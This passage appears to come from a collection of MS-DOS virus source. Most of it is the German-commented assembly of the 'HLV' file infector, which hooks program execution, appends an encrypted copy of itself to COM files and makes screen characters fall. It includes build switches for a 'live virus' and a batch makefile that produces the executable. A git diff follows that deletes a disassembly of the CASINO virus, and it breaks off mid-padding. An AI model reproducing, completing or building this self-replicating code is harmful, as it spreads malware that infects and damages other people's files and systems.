PSPsize ; - XD_009 DB 'HLV is on',0Dh,0Ah,'$' ; -Msg_On EQU XD_009 + PSPsize ; - XD_010 DB 'HLV is off',0Dh,0Ah,'$' ; -Msg_Off EQU XD_010 + PSPsize ; - ; -ENDIF ; - ; - XD_011 DW 9090 ; -File_Attributes EQU XD_011 + PSPsize ; - XD_012 DW 9090 ; -File_Date EQU XD_012 + PSPsize ; - XD_013 DW 9090 ; -File_Time EQU XD_013 + PSPsize ; - XD_014 DW 2 dup ( 9090 ) ; -Pathname EQU XD_014 + PSPsize ; - XD_015 DW 2 dup ( 9090 ) ; -File_Size_lsb EQU XD_015 + PSPsize ; -File_Size_msb EQU XD_015 + PSPsize + 2 ; - XD_016 DB NearJmp ; -FirstOpCode_1 EQU XD_016 + PSPsize ; - XD_017 DW 9090 ; -FirstOpCode_2 EQU XD_017 + PSPsize ; - XD_018 DB 90 ; -Num_of_Col EQU XD_018 + PSPsize ; - XD_019 DB 90 ; -Last_Line EQU XD_019 + PSPsize ; - XD_020 DB 90 ; -Prevent_Snow? EQU XD_020 + PSPsize ; -Last_Pair EQU THIS WORD + PSPsize ; - XD_021 DB 90 ; - XD_022 DB 90 ; -Last_Char EQU XD_021 + PSPsize ; -Last_Attr EQU XD_022 + PSPsize ; -RecTyp1 RECORD ExtCom:1, Recf_1:1, R_in_1c:1 ; - XD_023 RecTyp1 <0,0,0> ; -ISR_Flags EQU XD_023 + PSPsize ; - XD_024 DW 9090 ; -Seg_of_VRAM EQU XD_024 + PSPsize ; - XD_025 DW 9090 ; -Page_offset EQU XD_025 + PSPsize ; - XD_026 DW 9090 ; -Speed EQU XD_026 + PSPsize ; - XD_027 DW 9090 ; -XR_002 EQU XD_027 + PSPsize ; - XD_028 DW 9090 ; -XR_003 EQU XD_028 + PSPsize ; - XD_029 DW 9090 ; -Num_of_char EQU XD_029 + PSPsize ; - XD_030 DW 9090 ; -XR_004 EQU XD_030 + PSPsize ; - XD_031 DW 7 dup ( 9090 ) ; -FirstRandom EQU XD_031 + PSPsize ; -LastRandom EQU This Word + PSPsize ; - DW 9090 ; - comment # -Ŀ - Installieren u. relozieren falls notwendig. - - # ; -XI_004: CALL XI_005 ; -XI_005 LABEL NEAR ; -XR_005 EQU XI_005 + PSPsize ; - POP BX ; - SUB BX,FIRSTBASE2 ; - MOV CS:[BX+Disp_to_com_2],CS ; - MOV CS:[BX+Initial_AX],AX ; - MOV AX,CS:[BX+Org1stInstr_s1] ; - MOV [PSP_100],AX ; - MOV AL,CS:[BX+Org1stInstr_s2] ; - MOV [PSP_102],AL ; - PUSH BX ; - MOV AH,MS_GetVer ; - MSDOS ; - POP BX ; - CMP AL,DOS_v_02 ; - JB XI_006 ; - MOV AX,MS_Exec * 100 + Virus_fun ; - XOR DI,DI ; - XOR SI,SI ; - MSDOS ; - CMP DI,Virus_sig ; - JNZ XI_007 ; -XI_006: STI ; - MOV_S ES,DS ; - MOV AX,CS:[BX+Initial_AX] ; - JMP DWORD PTR CS:[BX+Disp_to_com_1] ; -XI_007: PUSH BX ; - MOV AX,MS_GetInt * 100 + DOS ; - MSDOS ; - MOV AX,BX ; - POP BX ; - MOV CS:[BX+Org_int_21s],AX ; - MOV CS:[BX+Org_int_21s + 2],ES ;------------; - MOV AX, (OFFSET EOFC - OFFSET Crypt1) SHR 4 + 11 ; - MOV BP,CS ;------------; - DEC BP ; - MOV ES,BP ; - MOV SI,CS:[PSPCurCom] ; - MOV ES:[MemCBowned],SI ; - MOV DX,ES:[MemCBsize] ; - MOV ES:[MemCBsize],AX ; - MOV ES:[MemCBsig],'M' ; - SUB DX,AX ; - DEC DX ; - INC BP ; - ADD BP,AX ; - INC BP ; - MOV ES,BP ; - PUSH BX ; - MOV AH,MS_SetPSP ; - MOV BX,BP ; - MSDOS ; - POP BX ; - XOR DI,DI ; - MOV_S SS,ES ; - PUSH DI ; - LEA DI,[BX+XR_010] ; - MOV SI,DI ; - MOV CX,OFFSET EOFC ; - STD ; - REPZ MOVSB ; - PUSH ES ; - LEA CX,[BX+XR_006] ; - PUSH CX ; - RETF ; -XI_008 LABEL NEAR ; -XR_006 EQU OFFSET XI_008 + FIRSTBASE ; - MOV CS:[BX+Disp_to_com_2],CS ; - LEA CX,[BX+Crypt2] ; - REPZ MOVSB ; - MOV CS:[PSP_SegJFB],CS ; - DEC BP ; - MOV ES,BP ; - MOV ES:[MemCBsize],DX ; - MOV ES:[MemCBsig],'Z' ; - MOV ES:[MemCBowned],CS ; - INC BP ; - MOV ES,BP ; - MOV_S ES,DS ; - MOV_S DS,CS ; - LEA SI,[BX+Crypt2] ; - MOV DI,PSPsize ; - MOV CX,OFFSET EOFC ; - CLD ; - REPZ MOVSB ; - PUSH ES ; - LEA AX,[XR_007] ; - PUSH AX ; - RETF ; -XI_009 LABEL NEAR ; -XR_007 EQU XI_009 + PSPsize ; - MOV CS:[PSPEnv],NoEnv ; - MOV CS:[PSPCurCom],CS ; - PUSH DS ; - LEA DX,[XR_008] ; - MOV_S DS,CS ; - MOV AX,MS_SetInt * 100 + DOS ; - MSDOS ; - POP DS ; - MOV AH,MS_SetDTA ; - MOV DX,DTA_in_PSP ; - MSDOS ; - SAVE DS,ES,SI,DI,CX ; - MOV_S ES,CS ; - MOV CX,BIOSDATASEG ; - MOV DS,CX ; - MOV DI,OFFSET FirstRandom ; - MOV SI,OFFSET B_TIMERVAR ; - MOV CL,8 ; - CLD ; - REPZ MOVSW ; - REST CX,DI,SI,ES,DS ; - ; -IF SWITCHABLE ; - ; - PUSH DS ; - MOV AX,MS_GetInt * 100 + DOS_multi ; - MSDOS ; - MOV CS:[Org_Int_2F],BX ; - MOV CS:[Org_Int_2F + 2],ES ; - MOV AX,MS_SetInt * 100 + DOS_multi ; - MOV DX,offset Int_2F_ISR ; - MOV_S DS,CS ; - MSDOS ; - POP DS ; - ; -ENDIF ; - ; - OR CS:[ISR_Flags],MASK ExtCom ; - MOV AH,MS_GetDateTime ; - MSDOS ; - CMP CX,YEAR ; - JZ XI_010 ; - JMP SHORT XI_011 ; -XI_010: CMP DH,MONTH ; - JB XI_011 ; - AND CS:[ISR_Flags],NOT MASK ExtCom ; -XI_011: MOV AX,1518 ; - CALL Random ; - INC AX ; - MOV CS:[XR_002],AX ; - MOV CS:[XR_003],AX ; - MOV CS:[XR_004],1 ; - MOV AX,MS_GetInt * 100 + TimerInt ; - MSDOS ; - MOV CS:[Org_Int_1C],BX ; - MOV CS:[Org_Int_1C + 2],ES ; - PUSH DS ; - MOV AX,MS_SetInt * 100 + TimerInt ; - MOV DX,OFFSET XR_009 ; - MOV_S DS,CS ; - MSDOS ; - POP DS ; -XI_012: MOV BX,OFFSET XR_005 - (FIRSTBASE2) ; - JMP XI_006 ; - comment # -Ŀ - Neue Interrupt 21(h) Behandlungsroutine ( verndert Exec - Funktion ). - - # ; -XI_013 LABEL NEAR ; -XR_008 EQU XI_013 + PSPsize ; - CMP AH,MS_Exec ; - JZ XI_016 ; -XI_014: JMP DWORD PTR CS:[Org_Int_21t] ; -XI_015: MOV DI,Virus_Sig ; - LES AX,CS:DWORD PTR [Org_Int_21t] ; - MOV DX,CS ; - IRET ; -XI_016: CMP AL,Virus_fun ; - JZ XI_015 ; - CMP AL,MS_Exec_SF0 ; - JNZ XI_014 ; - SAVE F,AX,BX,CX,DX,SI,DI,BP,ES,DS ; - MOV CS:[Pathname],DX ; - MOV CS:[Pathname + 2],DS ; - MOV_S ES,CS ; - MOV AX,MS_Open * 100 + Read_Only ; - MSDOS ; - JB XI_018 ; - MOV BX,AX ; - MOV AX,MS_GetFileDate ; - MSDOS ; - MOV CS:[File_Date],DX ; - MOV CS:[File_Time],CX ; - MOV AH,MS_Read ; - MOV_S DS,CS ; - MOV DX,OFFSET Org1stInstr_t1 ; - MOV CX,3 ; - MSDOS ; - JB XI_018 ; - CMP AX,CX ; - JNZ XI_018 ; - MOV AX,MS_MoveFP * 100 + OfsFrmEnd ; - XOR CX,CX ; - XOR DX,DX ; - MSDOS ; - MOV CS:[File_Size_lsb],AX ; - MOV CS:[File_Size_msb],DX ; - MOV AH,MS_Close ; - MSDOS ;---------------; - CMP CS:[Org1stInstr_t1], 'Z' * 100 + 'M' ; - JNZ XI_017 ; - JMP XI_025 ; -XI_017: CMP CS:[File_Size_msb],+0 ; - JA XI_018 ; - CMP CS:[File_Size_lsb],offset Crypt1-offset EOFC-20 ; - JBE XI_019 ; -XI_018: JMP XI_025 ; -XI_019: CMP BYTE PTR CS:[Org1stInstr_t1],NearJmp ; - JNZ XI_020 ; - MOV AX,CS:[File_Size_lsb] ; - ADD AX,OFFSET Crypt1 - offset EOFC - 2 ; - CMP AX,CS:[Org1stInstr_t2] ;---------------; - JZ XI_018 ; - ; -IF DEMO ; -XI_020: CALL DEMO_Infect ; - JMP XI_025 ; - ; -IF2 ;----------------; -%Out ͻ -%Out Demo - Version, -%Out k e i n Virus. -ENDIF ;----------------; -ELSE ; -IFDEF _DANGER ; -XI_020 MOV AX,MS_GetFileAttr ; - LDS DX,CS:DWORD PTR [Pathname] ; - MSDOS ; - JB XI_018 ; - MOV CS:[File_Attributes],CX ; - XOR CL,Attr_A ; - TEST CL,Attr_ASHR ; - JZ XI_021 ; - MOV AX,MS_SetFileAttr ; - XOR CX,CX ; - MSDOS ; - JB XI_018 ; -XI_021: MOV AX,MS_Open * 100 + Read_Write ; - MSDOS ; - JB XI_018 ; - MOV BX,AX ; - MOV AX,MS_MoveFP * 100 + OfsFrmEnd ; - XOR CX,CX ; - XOR DX,DX ; - MSDOS ; - CALL Append_Virus ; - JNB XI_022 ; - MOV AX,MS_MoveFP * 100 + OfsFrmTop ; - MOV CX,CS:[File_Size_msb] ; - MOV DX,CS:[File_Size_lsb] ; - MSDOS ; - MOV AH,MS_Write ; - XOR CX,CX ; - MSDOS ; - JMP SHORT XI_023 ; -XI_022: MOV AX,MS_MoveFP * 100 + OfsFrmTop ; - XOR CX,CX ; - XOR DX,DX ; - MSDOS ; - JB XI_023 ; - MOV AX,CS:[File_Size_lsb] ; - ADD AX,-2 ; - MOV CS:[FirstOpCode_2],AX ; - MOV AH,MS_Write ; - MOV DX,OFFSET FirstOpCode_1 ; - MOV CX,3 ; - MSDOS ; -XI_023: MOV AX,MS_SetFileDate ; - MOV DX,CS:[File_Date] ; - MOV CX,CS:[File_Time] ; - MSDOS ; - MOV AH,MS_Close ; - MSDOS ; - MOV CX,CS:[File_Attributes] ; - TEST CL,Attr_SHR ; - JNZ XI_024 ; - TEST CL,Attr_A ; - JNZ XI_025 ; -XI_024: MOV AX,MS_SetFileAttr ; - LDS DX,CS:DWORD PTR [Pathname] ; - MSDOS ; -IF2 ;----------------; -%Out ͻ -%Out KEIN DEMO, -%Out scharfer Virus. -ENDIF ; -ELSE ; - .ERR ; -ENDIF ; -ENDIF ; -IF SWITCHABLE ; -IF2 ; -%Out ͻ -%Out Neuer interner MSDOS Befehl '_HLV_' ! -ENDIF ; -ELSE ; -IF2 ; -%Out ͻ -%Out Kommando '_HLV_' nicht implementiert. -ENDIF ; -ENDIF ; -DISPNUM MACRO nu,nuxx ; -%Out (Monat - Jahr) nu - nuxx -ENDM ; -IF2 ; -%Out Bis zum Jahresende aktiv ab: -.radix 10 ; -DISPNUM %MONTH,%YEAR ; -.radix 16 ; -%Out ͼ -endif ; -XI_025: REST DS,ES,BP,DI,SI,DX,CX,BX,AX,F ;----------------; - JMP XI_014 ; -IF DEMO ; - ; - comment # -Ŀ - Statt APPEND in der DEMO - Version aufgerufene Prozedur. - - # ; -DEMO_INFECT PROC NEAR ; - push ax ; - push cx ; - in al,61 ; - or al,3 ; - out 61,al ; - mov al,0b6 ; - out 43,al ; - mov cx,0a ; -XI_026: dec cx ; - jz XI_030 ; -XI_027: mov ax,200d ; -XI_028: dec ax ; - cmp ax,100d ; - jz XI_031 ; - push ax ; - out 42,al ; - push cx ; - mov cx,150d ; -XI_029: nop ; - loop XI_029 ; - pop cx ; - mov al,ah ; - out 42,al ; - pop ax ; - jmp XI_028 ; -XI_030: in al,61 ; - and al,0fc ; - out 61,al ; - pop cx ; - pop ax ; - ret ; -XI_031: inc ax ; - cmp ax,600d ; - jz XI_026 ; - push ax ; - out 42,al ; - push cx ; - mov cx,150d ; -XI_032: nop ; - loop XI_032 ; - pop cx ; - mov al,ah ; - out 42,al ; - pop ax ; - jmp XI_031 ; -DEMO_INFECT ENDP ; - ; -ELSE ; - comment # -Ŀ - Append Virus - von der Int21ISR aufgerufene Infektions-Prozdur - - # ; -Append_Virus PROC NEAR ; - SAVE ES,BX ; - MOV AH,MS_AllocMem ;----------; - MOV BX,(OFFSET EOFC - OFFSET Crypt1) SHR 4 + 1 ; - MSDOS ;----------; - POP BX ; - JNB XI_034 ; -XI_033: STC ; - POP ES ; - RET ; -XI_034: MOV CS:[Crypt3],EnCrptd ; - MOV ES,AX ; - MOV_S DS,CS ; - XOR DI,DI ; - MOV SI,PSPsize ; - MOV CX,OFFSET EOFC ; - CLD ; - REPZ MOVSB ; - MOV DI,OFFSET XI_003 ; - MOV SI,OFFSET XR_001 ; - ADD SI,[File_Size_lsb] ; - MOV CX,OFFSET EOFC - OFFSET XI_003 ; -XI_035: XOR ES:[DI],SI ; - XOR ES:[DI],CX ; - INC DI ; - INC SI ; - LOOP XI_035 ; - MOV DS,AX ; - MOV AH,MS_Write ; - XOR DX,DX ; - MOV CX,OFFSET EOFC ; - MSDOS ; - SAVE F,AX ; - MOV AH,MS_ReleaseMem ; - MSDOS ; - REST AX,F ; - MOV_S DS,CS ; - JB XI_033 ; - CMP AX,CX ; - JNZ XI_033 ; - POP ES ; - CLC ; - RET ; -Append_Virus ENDP ; - ; -ENDIF ; - comment # -Ŀ - 'Zufallszahlen' - Generator. - - # ; -Random PROC NEAR ; - SAVE DS ; - MOV_S DS,CS ; - SAVE BX,CX,DX,AX ; - MOV CX,7 ; - MOV BX,offset LastRandom ; - PUSH [BX] ; -XI_036: MOV AX,[BX-02] ; - ADC [BX],AX ; - DEC BX ; - DEC BX ; - LOOP XI_036 ; - POP AX ; - ADC [BX],AX ; - MOV DX,[BX] ; - POP AX ; - OR AX,AX ; - JZ XI_037 ; - MUL DX ; -XI_037: MOV AX,DX ; - REST DX,CX,BX,DS ; - RET ; -Random ENDP ; - comment # -Ŀ - Zeichen und Attribut aus Videospeicher auslesen. - - # ; -Load_from_VRAM PROC NEAR ; - SAVE SI,DS,DX ; - MOV AL,DH ; - MUL [Num_of_Col] ; - MOV DH,0 ; - ADD AX,DX ; - SHL AX,1 ; - ADD AX,[Page_offset] ; - MOV SI,AX ; - TEST [Prevent_Snow?],-1 ; - MOV DS,[Seg_of_VRAM] ; - JZ XI_038 ; - Wait_HRI_or_VRI ; -XI_038: LODSW ; - STI ; - REST DX,DS,SI ; - RET ; -Load_from_VRAM ENDP ; - comment # -Ŀ - Zeichen und Attribut (AX) in den Videospeicher schreiben. - - # ; -Write_to_VRAM PROC NEAR ; - SAVE DI,ES,DX,BX ; - MOV BX,AX ; - MOV AL,DH ; - MUL [Num_of_Col] ; - MOV DH,0 ; - ADD AX,DX ; - SHL AX,1 ; - ADD AX,[Page_offset] ; - MOV DI,AX ; - TEST [Prevent_Snow?],-1 ; - MOV ES,[Seg_of_VRAM] ; - JZ XI_039 ; - Wait_HRI_or_VRI ; -XI_039: MOV AX,BX ; - STOSB ; - STI ; - REST BX,DX,ES,DI ; - RET ; -Write_to_VRAM ENDP ; - comment # -Ŀ - Bit 0 von Port B des 8255 Chips zurcksetzen (IO-Adresse : &H61 ). - - # ; -Toggle_Speaker PROC NEAR ; - PUSH AX ; - IN AL,PORT_B_8255 ; - XOR AL,02 ; - AND AL,0FE ; - OUT PORT_B_8255,AL ; - POP AX ; - RET ; -Toggle_Speaker ENDP ; - comment # -Ŀ - CF gesetzt, wenn AL ein nicht darstellbares Zeichen enthlt. - - # ; -Is_it_blank_? PROC NEAR ; - CMP AL,0 ; - JZ XI_040 ; - CMP AL,20 ; - JZ XI_040 ; - CMP AL,-1 ; - JZ XI_040 ; - CLC ; - RET ; -XI_040: STC ; - RET ; -Is_it_blank_? ENDP ; - comment # -Ŀ - CF gesetzt, wenn AL ein Zeichen aus dem Linienzeichensatz enthlt. - - # ; -Spec_Graphik? PROC NEAR ; - CMP AL,0B0 ; - JB XI_041 ; - CMP AL,0DF ; - JA XI_041 ; - STC ; - RET ; -XI_041: CLC ; - RET ; -Spec_Graphik? ENDP ; - comment # -Ŀ - Geschwindigkeit der Maschine ( zur Verwendung in DELAY ) ermitteln. - - # ; -GetSysSpeed PROC NEAR ; - PUSH DS ; - MOV AX,BIOSDATASEG ; - MOV DS,AX ; - STI ; - MOV AX,[B_TIMERVAR] ; -XI_042: CMP AX,[B_TIMERVAR] ; - JZ XI_042 ; - XOR CX,CX ; - MOV AX,[B_TIMERVAR] ; -XI_043: INC CX ; - JZ XI_045 ; - CMP AX,[B_TIMERVAR] ; - JZ XI_043 ; -XI_044: POP DS ; - MOV AX,CX ; - XOR DX,DX ; - MOV CX,0F ; - DIV CX ; - MOV CS:[Speed],AX ; - RET ; -XI_045: DEC CX ; - JMP XI_044 ; -GetSysSpeed ENDP ; - comment # -Ŀ - Verzgern ( Verzgerungszeit ist kaum maschinenabhngig ). - - # ; -Delay PROC NEAR ; - PUSH CX ; -XI_046: PUSH CX ; - MOV CX,[Speed] ; -XI_047: LOOP XI_047 ; - POP CX ; - LOOP XI_046 ; - POP CX ; - RET ; -Delay ENDP ; - comment # -Ŀ - Eine neue Interrupt 1C(h) Behandlungsroutine. - - # ; -XI_048 LABEL NEAR ; -XR_009 EQU XI_048 + PSPsize ;----------; - TEST CS:[ISR_Flags],MASK R_in_1c OR MASK ExtCom ; - JZ XI_049 ;----------; - JMP XI_067 ; -XI_049: OR CS:[ISR_Flags],MASK R_in_1c ; - DEC CS:[XR_002] ; - JZ XI_050 ; - JMP XI_066 ; -XI_050: SAVE DS,ES ; - MOV_S DS,CS ; - MOV_S ES,CS ; - SAVE AX,BX,CX,DX,SI,DI,BP ; - MOV AL,EOI_8259A ; - OUT PORT_B_8259A,AL ; - MOV AX,[XR_003] ; - CMP AX,0438 ; - JNB XI_051 ; - MOV AX,0438 ; -XI_051: CALL Random ; - INC AX ; - MOV [XR_002],AX ; - MOV [XR_003],AX ; - PUSH DS ; - MOV AX,BIOSDATASEG ; - MOV DS,AX ; - MOV AX,[B_VidPage] ; - POP DS ; - MOV [Page_offset],AX ; - MOV [Last_Line],18 ; - MOV DL,-1 ; - MOV AX,1130 ; - MOV BH,0 ; - SAVE ES,BP ; - INT 10 ; - REST BP,ES ; - CMP DL,-1 ; - JZ XI_052 ; - MOV [Last_Line],DL ; -XI_052: CALL GetSysSpeed ; - MOV AH,0F ; - INT 10 ; - MOV [Num_of_Col],AH ; - MOV [Prevent_Snow?],0 ; - MOV [Seg_of_VRAM],MonoBase ; - CMP AL,07 ; - JZ XI_054 ; - JB XI_053 ; - JMP XI_064 ; -XI_053: MOV [Seg_of_VRAM],ColorBase ; - CMP AL,03 ; - JA XI_054 ; - CMP AL,02 ; - JB XI_054 ; - MOV [Prevent_Snow?],01 ; - MOV AL,[Last_Line] ; - INC AL ; - MUL [Num_of_Col] ; - MOV [Num_of_char],AX ; - MOV AX,[XR_004] ; - CMP AX,[Num_of_char] ; - JBE XI_054 ; - MOV AX,[Num_of_char] ; -XI_054: CALL Random ; - INC AX ; - MOV SI,AX ; -XI_055: XOR DI,DI ; -XI_056: INC DI ; - MOV AX,[Num_of_char] ; - SHL AX,1 ; - CMP DI,AX ; - JBE XI_057 ; - JMP XI_064 ; -XI_057: OR [ISR_Flags],MASK Recf_1 ; - MOV AL,[Num_of_Col] ; - MOV AH,0 ; - CALL Random ; - MOV DL,AL ; - MOV AL,[Last_Line] ; - MOV AH,0 ; - CALL Random ; - MOV DH,AL ; - CALL Load_from_VRAM ; - CALL Is_it_blank_? ; - JB XI_056 ; - CALL Spec_Graphik? ; - JB XI_056 ; - MOV [Last_Pair],AX ; - MOV CL,[Last_Line] ; - MOV CH,0 ; -XI_058: INC DH ; - CMP DH,[Last_Line] ; - JA XI_062 ; - CALL Load_from_VRAM ; - CMP AH,[Last_Attr] ; - JNZ XI_062 ; - CALL Is_it_blank_? ; - JB XI_060 ; -XI_059: CALL Spec_Graphik? ; - JB XI_062 ; - INC DH ; - CMP DH,[Last_Line] ; - JA XI_062 ; - CALL Load_from_VRAM ; - CMP AH,[Last_Attr] ; - JNZ XI_062 ; - CALL Is_it_blank_? ; - JNB XI_059 ; - CALL Toggle_Speaker ; - DEC DH ; - CALL Load_from_VRAM ; - MOV [Last_Char],AL ; - INC DH ; -XI_060: AND [ISR_Flags],NOT MASK Recf_1 ; - DEC DH ; - MOV AL,' ' ; - CALL Write_to_VRAM ; - INC DH ; - MOV AL,[Last_Char] ; - CALL Write_to_VRAM ; - JCXZ XI_061 ; - CALL Delay ; - DEC CX ; -XI_061: JMP XI_058 ; -XI_062: TEST [ISR_Flags],MASK Recf_1 ; - JZ XI_063 ; - JMP XI_056 ; -XI_063: CALL Toggle_Speaker ; - DEC SI ; - JZ XI_064 ; - JMP XI_055 ; -XI_064: IN AL,PORT_B_8255 ; - AND AL,0FC ; - OUT PORT_B_8255,AL ; - MOV AX,3 ; - CALL Random ; - INC AX ; - MUL [XR_004] ; - JNB XI_065 ; - MOV AX,-1 ; -XI_065: MOV [XR_004],AX ; - REST BP,DI,SI,DX,CX,BX,AX,ES,DS ; -XI_066: AND CS:[ISR_Flags],NOT MASK R_in_1c ; -XI_067: JMP DWORD PTR CS:[Org_Int_1C] ; - ; -IF SWITCHABLE ; - ; - comment # -Ŀ - Implementierung eines neuen in CMD_2F definierten internen Befehls. - - # ; -XI_068 Label Near ; -Int_2F_ISR EQU XI_068 + PSPsize ; - CMP AH,0AEH ; - JNZ Int_2F_end ; - CMP DX,-1 ; - JNZ Int_2F_end ; - CMP AL,0 ; - JNZ Int_2F_2nd ; - CALL Decode_2F ; - JNZ Int_2F_end ; - DEC AL ; - IRET ; -Int_2F_2nd: CMP AL,1 ; - JNZ Int_2F_end ; - CALL Decode_2F ; - JNZ Int_2F_end ; - SAVE DS,DX,AX ; - MOV_S DS,CS ; - XOR [ISR_Flags],MASK ExtCom ; - MOV DX,OFFSET MSG_ON ; - TEST [ISR_Flags],MASK ExtCom ; - JZ XI_069 ; - MOV DX,OFFSET MSG_OFF ; -XI_069: MOV AH,9 ; - MSDOS ; - REST AX,DX,DS ; - AND BYTE PTR [SI],0 ; - IRET ; -Int_2F_end: JMP DWORD PTR CS:[Org_Int_2F] ; - comment # -Ŀ - berprfen, ob der in CMD_2F definierte Befehl angesprochen wurde. - - # ; -Decode_2F PROC NEAR ; - SAVE SI,DI,ES,CX ; - MOV CX,05 ; - MOV_S ES,CS ; - MOV DI,OFFSET Cmd_2F ; - CLD ; - REPE CMPSW ; - REST CX,ES,DI,SI ; - RET ; -Decode_2F ENDP ; - ; -ENDIF ; - comment # -Ŀ - Okay, das war's. Zum Schlu noch einige Definitionen. - - # ; -EOFC EQU THIS WORD ; -XR_010 EQU OFFSET EOFC - 1 + FIRSTBASE ; -TEXT ENDS ; -IF2 ;----------------; -%Out -%Out (C) 1990 164A12565AA18213165556D3125C4B962712 ͼ -ENDIF ; -comment # -ͻ - - So knnte ein Batch - Makefile aussehen : - - @cls - @if %1.==. goto nopar - @if not exist %1.asm goto noasm - @ctty nul - @del %1.obj - @del %1.lst - @del %1.crf - @del %1.ref - @del %1.map - @del %1.exe - @del %1.bin - @del _HLV_.COM - @ctty con - @masm /b63 %1,,%1,%1 %2 %3 %4; - @if not exist %1.obj goto masm_err - @link %1,,%1; - @if not exist %1.exe goto link_err - @exe2bin %1; - @if not exist %1.bin goto exe2_err - @cref %1; - @if not exist %1.ref goto cref_err - @echo >> %1.lst - @copy %1.lst+%1.map+%1.ref %1.t > nul - @del %1.lst > nul - @ren %1.t %1.lst > nul - @del %1.obj > nul - @del %1.crf > nul - @del %1.ref > nul - @del %1.map > nul - @del %1.exe > nul - @echo n %1.bin > md.inp - @echo l 11f >> md.inp - @echo a 110 >> md.inp - @echo add cx,20 >> md.inp - @echo. >> md.inp - @echo g =110 113 >> md.inp - @echo f 110 11e 20 >> md.inp - @echo e 110 '%1' >> md.inp - @echo f 100 10f 90 >> md.inp - @echo a 100 >> md.inp - @echo jmp 120 >> md.inp - @echo nop >> md.inp - @echo nop >> md.inp - @echo nop >> md.inp - @echo mov ax,4c00 >> md.inp - @echo int 21 >> md.inp - @echo. >> md.inp - @echo n _HLV_.com >> md.inp - @echo w >> md.inp - @echo q >> md.inp - @debug < md.inp > nul - @cls - @echo. - @echo ͻ - @echo - @echo MAKEHLV erfolgreich beendet, _HLV_.com wurde erstellt. - @echo - @echo ͼ - @echo. - @goto ende - :nopar - @echo FEHLER ! Mindestens ein Parameter ist erforderlich ! - @echo Syntax : MAKEHLV asmfile [switches] - @goto ende - :noasm - @echo FEHLER ! Die Datei %1.ASM ist nicht zu finden ! - @goto ende - :masm_err - @echo FEHLER ! %1.OBJ konnte nicht erstellt werden ! - @goto ende - :link_err - @echo FEHLER ! %1.EXE konnte nicht erstellt werden ! - @goto ende - :exe2_err - @echo FEHLER ! %1.BIN konnte nicht erstellt werden ! - @goto ende - :cref_err - @echo FEHLER ! %1.REF konnte nicht erstellt werden ! - :ende - -ͼ -# -END diff --git a/c/CASINO (35).ASM b/c/CASINO (35).ASM deleted file mode 100755 index b88bc5f..0000000 --- a/c/CASINO (35).ASM +++ /dev/null @@ -1,1428 +0,0 @@ - -PAGE 59,132 - -; -; -; CASINO -; -; Created: 31-Aug-90 -; Version: -; Passes: 9 Analysis Options on: H -; Copyright S & S International, 1990 -; -; - -data_1e equ 60Ch ; (0000:060C=0) -data_2e equ 60Dh ; (0000:060D=0) -data_3e equ 60Eh ; (0000:060E=0) -data_4e equ 60Fh ; (0000:060F=0) -data_5e equ 610h ; (0000:0610=0) -data_6e equ 611h ; (0000:0611=0) -data_7e equ 612h ; (0000:0612=0) -data_8e equ 2 ; (6AE6:0002=0) -data_10e equ 3Bh ; (6AE6:003B=0) -data_11e equ 3Dh ; (6AE6:003D=0) -data_12e equ 3Fh ; (6AE6:003F=0) -data_13e equ 40h ; (6AE6:0040=0) -data_14e equ 41h ; (6AE6:0041=0) -data_15e equ 43h ; (6AE6:0043=6AE6h) -data_16e equ 45h ; (6AE6:0045=0) -data_17e equ 47h ; (6AE6:0047=6AE6h) -data_18e equ 4Dh ; (6AE6:004D=0) -data_19e equ 68h ; (6AE6:0068=0) -data_20e equ 7Eh ; (6AE6:007E=0) -data_21e equ 80h ; (6AE6:0080=0) -data_33e equ 716Eh ; (6AE6:716E=0) - -seg_a segment byte public - assume cs:seg_a, ds:seg_a - - - org 100h - -casino proc far - -start: - nop -data_23 db 0E9h -data_24 db 48h -data_25 db 7, 'ello - Copyright S & S Intern' - db 'ational, 1990', 0Ah, 0Dh, '$' - db 1Ah - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AA' - db 0E6h - db 'jAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - -casino endp - -; -; -; External Entry Point -; -; - -int_24h_entry proc far - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc 